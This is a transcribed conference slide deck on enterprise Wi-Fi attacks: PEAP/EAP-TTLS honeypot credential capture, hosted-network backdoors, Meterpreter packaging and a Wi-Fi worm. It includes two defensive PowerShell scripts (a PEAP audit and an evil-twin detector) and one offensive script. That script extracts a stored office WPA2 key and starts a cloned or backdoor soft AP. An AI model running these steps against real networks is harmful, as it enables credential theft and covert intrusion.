Scenario based hacking - enterprise wireless security (Vivek Ramachandran)

At the ClubHack 2011 Hacking and Security Conference, Vivek Ramachandran presented "Scenario based hacking - enterprise wireless security".
Speaker - Vivek Ramachandran
  • The Metasploit megaprimer has been re-created with the latest advances and also with a certification: http://securitytube-training.com/certifications/securitytube-metasploit-framework-expert/ Testimonials look good.
1. Scenario Based Hacking – Enterprise Wireless Security
Vivek Ramachandran, Founder, SecurityTube.net
vivek@securitytube.net
©SecurityTube.net

2. Vivek Ramachandran
• B.Tech, ECE, IIT Guwahati
• 802.1x, Cat65k (Cisco Systems)
• WEP Cloaking (Defcon 15)
• Caffe Latte Attack (Toorcon 9)
• Media coverage: CBS5, BBC
• Microsoft Security Shootout
• Trainer, 2011
• Wi-Fi Malware, 2011

3. In-Person Trainings

4. SecurityTube Online Certifications (25+ countries)

5. Free DVD (12+ hours of HD videos): http://www.securitytube.net/downloads

6. Scenario Based Hacking
• Multiple courses are available from different certification bodies
• They concentrate more on tools than on their application
  – Script kiddie mentality
• Real-world scenarios are not used
• Students find it tough to excel in the real world

7. The Real World
• Complicated scenarios
• Heterogeneous architecture
• Multiple security controls present at the same time
  – Firewalls, IDS/IPS, etc.
• Requires one to be a master of all, rather than a jack of all trades
• Basically "Scenario Based Hacking"

8. Understanding Scenario Based Hacking
(X = control absent, Present = control deployed)
Component           Scenario 1   Scenario 2   Scenario 3   Scenario 4
Patches             X            Present      Present      Present
Personal Firewall   X            X            Present      Present
AV                  X            X            X            Present
NAT                 X            X            X            X
Firewall            X            X            X            X
IDS                 X            X            X            X
IPS                 X            X            X            X
WAF                 X            X            X            X
…                   …            …            …            …

9. Simple Scenarios
A host directly reachable from the Internet with:
• No patches
• No AV
• No firewall
• No network IDS/IPS
• Direct access (no NAT)
• …

10. Complicated (diagram)

11. Interesting Ones! Coffee Shop, Airport (diagram)

12. Scenario Based Hacking for Wireless
• Enterprise Wireless Attacks
  – PEAP
  – EAP-TTLS
• Enterprise Rogue APs, Worms and Botnets

13. Enterprise Wireless Attacks: PEAP and EAP-TTLS
14. WPA-Enterprise: 802.1X/EAP exchange between Supplicant, Authenticator (AP) and Authentication Server
• Supplicant <-> Authenticator: Association
• Supplicant -> Authenticator: EAPoL-Start
• Authenticator -> Supplicant: EAP-Request/Identity
• Supplicant -> Authenticator: EAP-Response/Identity, relayed to the Authentication Server over RADIUS
• Supplicant <-> Authentication Server (through the Authenticator): EAP method packets
• Authentication Server -> Authenticator -> Supplicant: EAP-Success; the PMK is delivered to the AP
• Supplicant <-> Authenticator: 4-Way Handshake
• Data transfers

15. WPA-Enterprise
• Uses a RADIUS server for authentication
• Different supported EAP types – PEAP, EAP-TTLS, EAP-TLS, etc.
• De facto server – FreeRADIUS, www.freeradius.org
• Depending on the EAP type used, both client and server need to be configured

16. FreeRADIUS Wireless Pwnage Edition (WPE)
http://www.willhackforsushi.com/FreeRADIUS-WPE.html

17. WPA/WPA2 Enterprise
EAP Type    Real World Usage
PEAP        Highest
EAP-TTLS    High
EAP-TLS     Medium
LEAP        Low
EAP-FAST    Low
…           …

18. PEAP
• Protected Extensible Authentication Protocol
• Typical usage:
  – PEAPv0 with EAP-MSCHAPv2 (most popular)
    • Native support on Windows
  – PEAPv1 with EAP-GTC
• Other uncommon ones
  – PEAPv0/v1 with EAP-SIM (Cisco)
• Uses a server-side certificate for validation
• PEAP-EAP-TLS
  – Additionally uses client-side certificates or smartcards
  – Supported only by Microsoft

19. PEAP diagram (source: Layer3.wordpress.com)

20. Understanding the Insecurity
• Server-side certificates
  – Fake ones can be created
  – Clients may not validate them, or the user may be prompted and accept an invalid certificate
• Set up a honeypot AP with FreeRADIUS-WPE
  – Client connects
  – Accepts the fake certificate
  – Sends its authentication details over MSCHAPv2 inside the TLS tunnel
  – The attacker's RADIUS server logs the username and the MSCHAPv2 challenge/response
  – Apply a dictionary / reduced-keyspace brute-force attack to the challenge/response using Asleap by Joshua Wright
• The attack only works when the supplicant is not configured to validate the server certificate (trusted root CA and expected server name), or when the user is allowed to accept an unknown one

21. Windows PEAP Hacking Summed Up in 1 Slide (screenshot)

22. Demo of Enterprise Wireless Attacks: PEAP

23. EAP-TTLS
• EAP-Tunneled Transport Layer Security
• Server authenticates with a certificate
• Client can optionally use a certificate as well
• No native support on Windows at the time of this talk (Windows 7); 3rd party supplicants are needed
• Versions
  – EAP-TTLSv0
  – EAP-TTLSv1

24. Demo of Enterprise Wireless Attacks: EAP-TTLS

25. Can I be Secure? EAP-TLS
• Strongest security of all the EAPs out there
• Mandates both server-side and client-side certificates
• Support for it is required to get the WPA/WPA2 Enterprise logo on a product
• Unfortunately not very popular due to deployment challenges (a PKI and per-client certificate provisioning)
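The honeypot attack in slide 20 succeeds only against supplicants whose PEAP profile does not pin the RADIUS server's certificate. The following PowerShell script is an added example, not the presenter's code: it exports every saved WLAN profile with netsh and flags PEAP profiles (EAP type 25) whose ServerValidation settings leave that door open. It assumes an elevated prompt on an English-locale Windows 7 or later host and the standard Microsoft profile XML schema; the profile names it reports are whatever is saved on the host.

```powershell
# Added example for this page (not the presenter's code): audit saved WLAN
# profiles for the PEAP settings that let a FreeRADIUS-WPE honeypot succeed.
# Assumes an elevated PowerShell on Windows 7+ and the Microsoft profile schema.
function Get-PeapProfileAudit {
    $tmp = Join-Path $env:TEMP ("wlan-audit-" + [guid]::NewGuid().ToString('N'))
    New-Item -ItemType Directory -Path $tmp | Out-Null
    try {
        # Export every saved profile as XML; without key=clear any PSK stays encrypted.
        netsh wlan export profile folder="$tmp" | Out-Null
        foreach ($file in Get-ChildItem -Path $tmp -Filter '*.xml') {
            [xml]$doc = Get-Content -Path $file.FullName
            # The profile mixes several Microsoft namespaces, so match on local-name().
            $name   = $doc.SelectSingleNode("/*[local-name()='WLANProfile']/*[local-name()='name']").InnerText
            $method = $doc.SelectSingleNode("//*[local-name()='EapMethod']/*[local-name()='Type']")
            if ($null -eq $method -or $method.InnerText -ne '25') { continue }   # 25 = PEAP

            $sv       = "//*[local-name()='ServerValidation']"
            $perform  = $doc.SelectSingleNode("//*[local-name()='PerformServerValidation']")
            $noPrompt = $doc.SelectSingleNode("$sv/*[local-name()='DisableUserPromptForServerValidation']")
            $names    = $doc.SelectSingleNode("$sv/*[local-name()='ServerNames']")
            $roots    = $doc.SelectNodes("$sv/*[local-name()='TrustedRootCA']")

            $findings = @()
            if ($perform -and $perform.InnerText -eq 'false') {
                $findings += 'server certificate validation disabled'
            }
            if ($null -eq $noPrompt -or $noPrompt.InnerText -ne 'true') {
                $findings += 'user may accept an untrusted certificate'   # the WPE prompt path
            }
            if ($null -eq $names -or [string]::IsNullOrWhiteSpace($names.InnerText)) {
                $findings += 'no expected RADIUS server name pinned'
            }
            if ($roots.Count -eq 0) {
                $findings += 'no trusted root CA pinned'
            }

            [pscustomobject]@{
                Profile  = $name
                Findings = if ($findings) { $findings -join '; ' } else { 'OK' }
            }
        }
    } finally {
        Remove-Item -Path $tmp -Recurse -Force -ErrorAction SilentlyContinue
    }
}

Get-PeapProfileAudit | Format-Table -AutoSize
```

A profile that reports OK still trusts whichever root CA it pins, so the remaining check is that the pinned CA is the enterprise's own and not a public one the attacker can buy a certificate from.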
26. Enterprise Rogue APs, Backdoors, Worms and Botnets

27. Objective
• How malware could leverage Wi-Fi to create
  – Backdoors
  – Worms
  – Botnets

28. Background – Understanding Wi-Fi Client Software
• Allows the client to connect to an Access Point
• The user approves the network the first time; the client auto-connects in future
• Details are stored in configuration files (profiles)

29. Command Line Interaction?
• Scanning the air for the stored profiles that clients probe for
• Profiling the clients based on those searches
• Different clients behave differently
• Demo

30. See All Wi-Fi Interfaces
netsh wlan show interfaces

31. Drivers and Capabilities
netsh wlan show drivers

32. Scan for Available Networks
netsh wlan show networks

33. View Existing Profiles
netsh wlan show profiles

34. Starting a Profile
netsh wlan connect name="vivek"

35. Export a Profile
netsh wlan export profile name="vivek"

36. Creating an Access Point on a Client Device
• Requires special drivers and supported cards
• Custom software used – hostapd, airbase-ng
• More feasible on Linux-based systems

37. Generation 2.0 of Client Software – Hosted Network
• Available on Windows 7 and Server 2008 R2 onwards
• Virtual adapters on the same physical adapter
• A SoftAP can be created using the virtual adapter
  – DHCP server included
"With this feature, a Windows computer can use a single physical wireless adapter to connect as a client to a hardware access point (AP), while at the same time acting as a software AP allowing other wireless-capable devices to connect to it."
http://msdn.microsoft.com/en-us/library/dd815243%28v=vs.85%29.aspx

38. Feature Objective
• To allow creation of a wireless Personal Area Network (PAN)
  – Share data with devices
• Network connection sharing (ICS) with other devices on the network

39. Demonstration: Demo of Hosted Network

40. Creating a Hosted Network (screenshot)

41. Driver Support (screenshot)

42. Client still remains connected to the hardware AP!
43. Wi-Fi Backdoor
• Easy for malware to create a backdoor
• The key could be:
  – Fixed
  – Derived from the MAC address of the host, time of day, etc.
• As the host remains connected to the authorized network, the user does not notice a break in connection
• No message or prompt is displayed

44. Understanding Rogue Access Points (diagram: Rogue AP)

45. Makes a Rogue AP on every client! (diagram)

46. Best Part – No Extra Hardware!

47. Advantages? (diagram: Internet)

48. Advantages? (diagram: Wicked Network, Internet)

49. Why is this cool?
• The victim will never notice anything unusual unless he visits his network settings
  – and has to be decently technical to understand what he sees
• Attacker connects to the victim over a private network
  – no wired-side network logs: firewalls, IDS, IPS
  – Difficult, if not impossible, to trace back
  – Difficult to detect even while the attack is ongoing
    • Abuses a legitimate feature, not picked up by AVs or anti-malware
• More stealth? Monitor the air for other networks; when a specific network comes up, then start the backdoor

50. Chaining Hosted Networks like a proxy?
• Each node has client and AP capability
• We can chain them to "hop" machines
• The final machine can provide Internet access
• Like Wi-Fi repeaters

51. Chaining Infected Laptops (diagram): AP – Client | AP – Client | AP – Client … Authorized AP

52. Package Meterpreter for full access?
• Once the attacker connects to his victim, he will want access to everything
• Why not package a Meterpreter with this?
• How about a backdoor post-exploitation script for Metasploit?

53. Demo: Coupling Hosted Network with Metasploit

54. Increasing Stealth
• Passive monitoring for available SSIDs
• A trigger SSID causes the Wicked Hosted Network to start and create an application-level backdoor
• Attacker connects and does his job
• Shuts off the trigger SSID and the malware goes back to passive monitoring

55. Karmetasploit
• Victim connects by mistake or misassociation
• Victim opens a browser; Metasploit browser_autopwn exploits the system
• Hacker gets access!
• Biggest challenge – the victim notices he is connected to the wrong network and disconnects

56. Enhancing Karmetasploit
• Upon exploitation, create the hosted network backdoor
• The user disconnects, but the hosted network still remains active
• Attacker connects via this network

57. What about older clients and other OSs?
• Windows < 7 and Mac OS do not have the Hosted Network or a similar feature
  – Use Ad-Hoc networks
  – Use a connect-back mechanism
    • When a particular SSID is seen, connect to it automatically
    • A blurb reports "Connected to ABC" – could we kill it?

58. Hosted Network Meterpreter Scripts
http://zitstif.no-ip.org/meterpreter/rogueap.txt
http://www.digininja.org/projects.php
59. Dissecting Worm Functionality
Worm = Propagation Technique + Exploit

60. Hosted Network Encryption
• Uses WPA2-PSK for encryption
• The key is stored encrypted in the profile (configuration file)
• It can be decrypted on the host
• What if there is an office network configured on the same machine with WPA2-PSK?

61. Step 1. Infect an Authorized Computer and Decrypt the Passphrase

62. Decryption Routine (screenshot)

63. Alternate – Dump and Copy (screenshot)

64. Step 2. Create a Soft Access Point with the same Credentials (diagram: OfficeAP, and OfficeAP again on the worm-infected laptop)

65. Step 3. Signal Strength Game (diagram: OfficeAP vs. OfficeAP on the worm-infected laptop)

66. Step 4. Hop and Exploit (diagram: OfficeAP, Exploit)

67. Step 5. Replicate and Spread (diagram: OfficeAP, OfficeAP)

68. Worm's Wi-Fi Network Signal Strength > AP (diagram: OfficeAP repeated on each infected laptop)

69. Wi-Fi Worm
• Retrieve the network key for the office network
• Create a hosted network with the same name and key
• When the victim is in the vicinity of his office, the worm can be activated
• At some point its signal strength may be higher than that of the real AP
• Other colleagues' laptops may hop over and connect
  – Conference rooms, coffee and break areas
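Steps 1 to 3 of the worm (slides 60 to 69) and the backdoor of slide 43 both come down to the same netsh hosted-network calls. The script below is an added example written for this page, not the demo code from the talk. It reads the office profile's passphrase with netsh wlan show profile ... key=clear (which is what the "decrypt passphrase" step amounts to on Windows 7 once you already run as administrator), checks the driver for hosted network support, and brings up a soft AP with the same SSID and key; the commented-out backdoor variant derives the key from the adapter MAC instead. The profile name OfficeAP, the SSID wicked and the key-derivation scheme are assumptions. It needs an elevated prompt, an English locale (the netsh text is parsed) and a lab host you are authorised to test.

```powershell
# Added example (not the presenter's demo script): the hosted-network steps
# from slides 43 and 60-69 as one script. Requires an elevated prompt on
# Windows 7 / Server 2008 R2 or later, an English locale for the netsh parsing,
# and a Wi-Fi driver that reports "Hosted network supported : Yes".
# Lab use on hosts you are authorised to test only.

function Test-HostedNetworkSupport {
    # "netsh wlan show drivers" prints the capability flag once per adapter
    $lines = netsh wlan show drivers
    return [bool]($lines | Select-String -Pattern 'Hosted network supported\s*:\s*Yes')
}

function Get-ProfileKey([string]$ProfileName) {
    # key=clear makes netsh decrypt the stored PSK for us (needs admin); this is
    # the worm's "decrypt passphrase" step without writing our own routine.
    $lines = netsh wlan show profile name="$ProfileName" key=clear
    $m = $lines | Select-String -Pattern 'Key Content\s*:\s*(.+)$' | Select-Object -First 1
    if ($m) { return $m.Matches[0].Groups[1].Value.Trim() }
    return $null
}

function New-DerivedKey {
    # Backdoor variant (slide 43): derive the PSK from the adapter MAC so the
    # operator can recompute it later without storing it on disk. The scheme
    # (SHA-256 of the MAC string, first 16 hex digits) is this example's own.
    $m = netsh wlan show interfaces | Select-String -Pattern 'Physical address\s*:\s*(.+)$' | Select-Object -First 1
    if (-not $m) { throw 'No wireless interface found' }
    $mac  = $m.Matches[0].Groups[1].Value.Trim().ToLower()
    $sha  = [System.Security.Cryptography.SHA256]::Create()
    $hash = $sha.ComputeHash([System.Text.Encoding]::ASCII.GetBytes($mac))
    return ([System.BitConverter]::ToString($hash) -replace '-', '').Substring(0, 16)
}

function Start-SoftAP([string]$Ssid, [string]$Key) {
    if (-not (Test-HostedNetworkSupport)) { throw 'Driver does not support the hosted network' }
    if ($Key.Length -lt 8 -or $Key.Length -gt 63) { throw 'WPA2-PSK passphrase must be 8-63 characters' }
    # The virtual AP comes up beside the existing client association (slide 42)
    netsh wlan set hostednetwork mode=allow ssid="$Ssid" key="$Key" | Out-Null
    netsh wlan start hostednetwork | Out-Null
    netsh wlan show hostednetwork
}

# Worm step 2: clone the office network's SSID and passphrase (profile name assumed)
$officeKey = Get-ProfileKey -ProfileName 'OfficeAP'
if ($officeKey) { Start-SoftAP -Ssid 'OfficeAP' -Key $officeKey }

# Backdoor variant: private SSID with a MAC-derived key
# Start-SoftAP -Ssid 'wicked' -Key (New-DerivedKey)

# Tear down when finished
# netsh wlan stop hostednetwork; netsh wlan set hostednetwork mode=disallow
```

The cloned soft AP advertises the office SSID from the virtual adapter's own BSSID, so colleagues' saved OfficeAP profiles will associate to it by SSID and passphrase alone; that different BSSID is also the one thing a wireless IDS can key on.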
70. Why is this interesting?
• The worm uses its own private Wi-Fi network to propagate
• Does not use the wired LAN at all
• Difficult for network defenses to detect and mitigate
  • Targeted APT against an enterprise
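From the defender's side, the worm's hosted network is just the office SSID appearing on a BSSID the WLAN team never deployed, and on the infected host itself netsh wlan show hostednetwork reports it as Started. The script below is an added example, not part of the talk: it parses netsh wlan show networks mode=bssid output into SSID/BSSID pairs, compares the office SSID's BSSIDs against an allow-list, and reports the local hosted network status. The SSID OfficeAP, the allow-listed BSSIDs and the embedded sample scan are constructed for the example; when netsh is not present (for instance under pwsh on Linux) the sample is parsed instead, so the parser runs offline.

```powershell
# Added example (not from the slides): defender-side checks for the rogue hosted
# networks described above. English-locale netsh output is assumed; the SSID,
# allow-list and sample scan below are constructed for this example.
$OfficeSsid  = 'OfficeAP'
$KnownBssids = @('00:11:22:33:44:55', '00:11:22:33:44:66')   # from the WLAN controller / site survey

# Constructed "netsh wlan show networks mode=bssid" output; the second OfficeAP
# BSSID is the infected laptop winning the signal strength game.
$SampleScan = @'
Interface name : Wireless Network Connection
There are 2 networks currently visible.

SSID 1 : OfficeAP
    Network type            : Infrastructure
    Authentication          : WPA2-Personal
    Encryption              : CCMP
    BSSID 1                 : 00:11:22:33:44:55
         Signal             : 61%
         Channel            : 6
    BSSID 2                 : 0a:1b:2c:3d:4e:5f
         Signal             : 88%
         Channel            : 6

SSID 2 : CoffeeShop
    Network type            : Infrastructure
    Authentication          : Open
    Encryption              : None
    BSSID 1                 : 00:aa:bb:cc:dd:ee
         Signal             : 40%
'@ -split "`r?`n"

# Constructed "netsh wlan show hostednetwork" output from an infected host
$SampleHosted = @('Hosted network settings', '    Mode                   : Allowed',
                  '    SSID name              : "OfficeAP"', 'Hosted network status',
                  '    Status                 : Started')

function Get-SsidBssidMap([string[]]$NetshOutput) {
    # SSID -> list of objects with Bssid and Signal (%) parsed from the netsh text
    $map  = @{}
    $ssid = $null
    $last = $null
    foreach ($line in $NetshOutput) {
        if ($line -match '^SSID\s+\d+\s*:\s*(.*)$') {
            $ssid = $Matches[1].Trim()
            if (-not $map.ContainsKey($ssid)) { $map[$ssid] = New-Object System.Collections.ArrayList }
        } elseif ($ssid -ne $null -and $line -match '^\s*BSSID\s+\d+\s*:\s*([0-9a-f]{2}(:[0-9a-f]{2}){5})') {
            $last = [pscustomobject]@{ Bssid = $Matches[1].ToLower(); Signal = 0 }
            [void]$map[$ssid].Add($last)
        } elseif ($last -ne $null -and $line -match '^\s*Signal\s*:\s*(\d+)%') {
            $last.Signal = [int]$Matches[1]
        }
    }
    return $map
}

function Find-EvilTwins([hashtable]$Map) {
    # Office SSID seen from a BSSID that is not one of ours
    if (-not $Map.ContainsKey($OfficeSsid)) { return @() }
    $Map[$OfficeSsid] | Where-Object { $KnownBssids -notcontains $_.Bssid }
}

function Get-LocalHostedNetworkStatus([string[]]$Lines) {
    $m = $Lines | Select-String -Pattern '^\s*Status\s*:\s*(.+)$' | Select-Object -First 1
    if ($m) { return $m.Matches[0].Groups[1].Value.Trim() }
    return 'Not available'
}

$haveNetsh = [bool](Get-Command netsh -ErrorAction SilentlyContinue)
$scan   = if ($haveNetsh) { netsh wlan show networks mode=bssid } else { $SampleScan }
$hosted = if ($haveNetsh) { netsh wlan show hostednetwork } else { $SampleHosted }

foreach ($t in (Find-EvilTwins -Map (Get-SsidBssidMap -NetshOutput $scan))) {
    Write-Warning ('{0} advertised by unknown BSSID {1} (signal {2}%)' -f $OfficeSsid, $t.Bssid, $t.Signal)
}
Write-Output ('Local hosted network status: ' + (Get-LocalHostedNetworkStatus -Lines $hosted))

# Hardening on managed clients: refuse hosted networks on this host altogether
# netsh wlan set hostednetwork mode=disallow
```

On the sample data the script warns about 0a:1b:2c:3d:4e:5f at 88% and reports the local hosted network as Started. The BSSID check is only as good as the allow-list, and a single laptop sees a single room, so in practice the scan is collected from several hosts or from the WLAN controller's own rogue detection.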
71. Demo

72. On the Run (screenshot)

73. APIs for the Hosted Network Feature (screenshot)

74. Questions?
vivek@securitytube.net

75. SecurityTube Online Certifications (25+ countries)

76. Free DVD (12+ hours of HD videos): http://www.securitytube.net/downloads